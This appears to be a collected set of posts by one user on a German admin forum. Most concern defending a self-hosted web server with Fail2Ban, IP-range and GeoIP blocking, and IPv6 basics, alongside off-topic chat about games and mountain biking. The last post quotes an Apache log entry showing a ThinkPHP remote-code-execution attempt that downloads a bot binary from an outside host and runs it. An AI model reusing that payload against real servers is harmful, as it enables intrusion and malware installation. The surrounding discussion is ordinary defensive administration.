Beiträge von whoami0501

    Jep, habe ich. Hab es nun angeschalten, aber passiert ist irgendwie noch nichts...

    Das klingt so, als würdest du das manuell machen?

    Naja. Ich lass mir dann einfach immer die Fail2Ban reports im Postfach nach Betreff sortieren, womit automatisch ähnliche IP Adressen beieinander stehen. Da dann fix drüber geschaut, und auffällige Netzbereiche geblockt. Dabei bin ich allerdings noch nie über /24er Netze hinaus gegegangen...

    Bei mir haben sich auch gerade alle bis auf ein Plugin deaktiviert. Könnte kerzengrade durch die Decke gehen - wie fahrlässig muss ein Entwickler handeln, um sowas zu veröffentlichen?! O.o



    Was Anno 1800 betrifft - meeega :love:

    Ich habs mir auch geholt, es ist absolut genial! Ich hab in diesem Zuge auch gleich auf eine Gigabyte Aorus RTX2070 Xtreme aufgerüstet - das größte Spielvergnügen, dass ich jemals hatte!

    Wenn ich keine Dienste für „Fremde“ anbiete, könnte auch das Betreiben in einem VPN sinnvoll sein, sodass man erst einmal im VPN sein muss, um den Dienst überhaupt sehen zu können.

    Ich habe schon ein VPN, da läuft auch alles interne drin. Aber ich biete genauso auch Dienste an, die für Fremde sind. Und auf meine Cloud möchte ich auch ohne VPN zugreifen können. Was IPv6 betrifft, nutze ich das noch nicht.


    Einige Netzbereiche konnte ich anhand von Fail2Ban schon rausfinden und fest blocken. Ich denke darauf wird es in Zukunft auch hinauslaufen - Netzbereiche ermitteln und blocken...

    sprich: ohne Eintrag in der radvd.conf gibts bei mir zu Hause keine IPv6-Adresse und auch keine IPv6-Gateway-Adresse

    Das erinnert mich grad an was.

    Mein ISP ist da ja auch recht lustig, was IPv6 generell betrifft. Prinzipiell mal wieder das Henne Ei Problem und so... ^^


    Das bekam ich als Antwort, als ich fragte, ob und wann IPv6 eingeführt wird...

    Screenshot_2.png


    Klingt mal wieder stark nach "Wenn es die Serverbetreiber nutzen, machen wir das" - und die Serverbetreiber sagen dann, "Wenn die Provider die Kunden damit versorgen, dann machen wir es." :pinch:

    Möglichst effizient ist z.B. fail2ban bei korrekter EInrichtung. fail2ban sperrt IPs auch gerne schon vor dem ersten Zugriff. In der Regel nimmt man aber noch z.B. mod_security mit z.B. den Atomic ModSecurity Rules dazu. Bevor man das ganze scharf schaltet, betreibt man solche Lösungen immer erstmal für 1 Woche im Modus "Erkennen aber nur Loggen".


    Wenn du mehr Schutz brauchst, dann wäre eventuell  https://de.wikipedia.org/wiki/Cloudflare etwas für dich.


    Cloudflare ist zwar nichts für mich, aber der Rest klingt trotzdem gut.


    Wie genau kann Fail2Ban bannen, bevor etwas passiert ist? Der Zugriff des "Gegners" muss doch erstmal erfolgen, bevor überhaupt ein Logeintrag da ist, den Fail2Ban auswerten und "sanktionieren" kann?! :/

    Hi,


    wir hatten das Thema ja die Tage bereits angerissen...

    Es ist nichts neues, dass im Internet Bots, Crawler, Spider (und wie sie alle heißen) unterwegs sind, und versuchen, Sicherheitslücken zu finden oder Schadcode auszuführen. Oder die E-Mail Adressen suchen, um einen dann mit Spam zuzuballern. Auch wenn bei meinem Apache2 und meinen Webseiten eigentlich alles sicher ist - ich möchte mir sowas trotzdem ganz gerne vom Hals halten...


    Fail2Ban ist nur bedingt eine Lösung - ich sag mal so, 5 Minuten nach Aktivierung der Filter hat mich mein Co-Admin gefragt, warum er nicht mehr auf unsere Nextcloud drauf kommt. Danke dafür. xD

    Aber auch von der Taktik her. Damit Fail2Ban bannen kann, muss immer mindestens erstmal ein Request erfolgen. Und dann bannt der auch nur für einen gewissen Zeitraum. Klar, das kann man einstellen, aber auch nicht auf für immer. Für immer würde ja auch heißen, dass false Friends für immer gebannt werden. Das ist auch keine Lösung...


    Theoretisch kann man über iptables viel machen, aber auch dafür muss man auch erstmal die ganzen Port Ranges kennen. Auch nicht so die Musterlösung.



    Gibt es überhaupt eine Musterlösung? Wie tretet ihr dem Problem gegenüber?

    Was wäre eine möglichst effiziente Maßnahme, dessen Aufwand im halbwegs im Verhältnis zum Nutzen steht?

    Ich kann den Anhang übrigens auch nicht sehen.

    But... why? Der ist als Anhang angefügt und direkt als solches eingebunden, das muss am Forum liegen. Oder euer Adblocker haut es raus, keine Ahnung...

    Bei mir wird der Anhang überall angezeigt. :o

    Okay okay, die Frage ist nun: Was zum Teufel soll man mit so dermaßen vielen IP Adressen für einen Server anstellen? xD


    Wenn man Websites hostet, könnte man (ich hab mit rund 8 Mrd. gerechnet) für jeden Menschen dieser Welt ca. 2305843009 Websites mit jeweils eigener IP Adresse pro Seite hosten. Ist das nicht minimal übertrieben? :D


    EDIT: Okay, wenn man mit Containern arbeitet und jeder eine eigene Adresse bekommen soll. Aber selbst da ists viel zu viel. xD

    Verstehe ich das eigentlich richtig - das /64er IPv6 Subnet, das bei eigentlich allen Servern dabei ist, ermöglicht es mir, meinem Server 18446744073709551616 IPv6 Adressen zuzuweisen?


    Sorry, habe mich noch nie mit IPv6 beschäftigt... die dezent große Zahl verwundert mich grad bloß etwas...

    Auf ip2location.com gibt es iptables Listen gegen Bots von Suchmaschinen - hat hier schonmal wer damit gearbeitet? Sind die gut, oder blocken die mehr als sie sollen?

    Ich fahre auch ganz gerne Mountainbike, wenn auch zu selten. Wird Zeit, dass es wieder ordentlich warm wird!


    Habe derzeit ein eher altes Hardtail von Focus, werde aber, wenn alles klappt, diese Woche noch ein Giant Reign 2 (fully) von einem Kollegen abkaufen. :)

    DSC_4077.JPG


    Ansonsten... naja, wir haben ein Haus mit größerem Garten, die Arbeit da ist gewissermaßen auch mein Sport. ^^

    Es gibt abgefahrene Scripte die sich Anhand von GeoIP-Datenbanken die IP-Netze ziehen und in IPTables reinkippen, das wäre eine Möglichkeit.

    Was anderes wäre, dass du dir zum Beispiel eine virtuelle Sophos UTM vor schaltest und dort einen GeoIP Filter betreibst, da kannst du dann noch ganz anderen quatsch machen. Vermutlich aber overkill in der Situation.

    So schaut es aus. Prinzipiell nutzen eh nur ein paar Freunde und ich diesen Server, daher wäre das wirklich overkill.


    Ich habe mich jetzt dazu entschlossen, das ganze erstmal mit dem weitreichenden IP-Range Blocking zu probieren.

    Sollte es tatsächlich Probleme geben, habe ich entweder die Möglichkeit mein VPN (die Sperren betreffen bloß meinen Webserver) zu nutzen oder kann im Zweifel auch gewisse Netzbereiche wieder freigeben.


    Abwarten und Tee trinken...

    Ist keine gute Idee, du kannst auch IP-Space aus anderen RIR Regionen in der RIPE-Region announcen.

    Stimmt auch wieder....


    Gibt es bessere Möglichkeiten, sich "ungebetenen Gäste" bzw. so gesehen Angreifer (die z.B. primär aus der APNIC Region stammen) vom Hals zu halten?

    Mal so von der Theorie her...


    Angenommen ich greife nur aus Europa auf einen Server zu... da könnte ich ja eigentlich auf diesem alle eingehenden Verbindungen von den /8er Netzen, die nicht zur RIPE gehören, droppen, oder? :/

    Ach so läuft das... Jetzt hab auch ich es verstanden - das ist natürlich eine feine Sache. :)

    Interessant, was man im Apache Log so findet...


    Code
    access_cloud.log.3:77.69.193.138 - - [25/Apr/2019:21:31:50 +0200] "GET /index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20http://love.thotiana.live/bins/x86.bot;cat%20x86.bot%20>%20fucklol;chmod%20777%20fucklol;./fucklol%20thinkphp HTTP/1.1" 301 1095 "-" "WOW"


    Sieht echt nicht gesund aus, aber ich bezweifel, dass das geklappt hat. ^^